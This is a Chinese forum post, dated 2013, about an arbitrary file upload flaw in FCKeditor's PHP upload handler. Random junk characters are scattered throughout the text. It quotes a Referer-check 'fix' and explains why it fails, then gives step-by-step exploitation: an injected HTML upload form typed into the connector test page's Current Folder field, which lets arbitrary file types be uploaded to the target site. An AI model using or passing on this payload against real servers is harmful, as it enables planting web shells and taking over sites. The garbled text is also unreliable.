漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
* W' c8 r) _4 _! y网上给出的修复方案是
1 P+ T3 ?- D7 d' [+ i& R+ a9 @3 x修复方法,删除FCK编辑器用其他的编辑器! Q% C, L* z$ d
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件1 _5 T6 g. E7 j+ V1 W
在
k7 P- _. V8 Frequire(‘config.php’);1 h% v+ v1 F6 x1 v( `
require(‘util.php’);0 n8 s7 e$ E M# w! I1 y
的下面添加以下代码—————————–
( W, E7 G7 }( _- x+ \- C; }//防止外部提交0 ~' [# a/ P& g3 U% y+ n
function outsidepost()4 S, H( I f# M3 H6 o+ V. ]; p
{: W$ j, A$ N* s* H! _$ n& N& g$ ]
$servername=$_SERVER['SERVER_NAME'];
4 i% l# a- Y) ^+ p1 J$sub_from=@$_SERVER['HTTP_REFERER']; d" h5 i' }7 B* \0 O
$sub_len=strlen($servername);
5 @9 M. \' p" u" V$checkfrom=substr($sub_from,7,$sub_len);
; Y3 U4 ]! J) v8 d" uif($checkfrom!=$servername){, ~3 b/ l3 Q! S$ R
echo(“you don’t outsidepost!”);* l) D) S: E' K' E$ [5 Y
exit;
; C, q% x$ Y$ u2 N p}
4 X% y3 X$ k$ s, J}5 z3 e4 F0 C! F+ }! h: @' A, ~
outsidepost();
: q1 D+ D3 S7 c5 y g6 [" E防止外部提交,但是没有防止内部提交,% L( M9 A1 [1 l
利用方法:. O7 ], y! c* b( Y# g) m* [
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html0 \4 {8 K" Q/ R! \# L9 t2 U; x* Q$ }
2,在Current Folder 框输入
% T: [; E" Z6 t# E( n, R<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
; I6 \6 [! u& q$ L然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。4 C( w+ b* D3 A- C) s$ z" a2 b# K) y
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对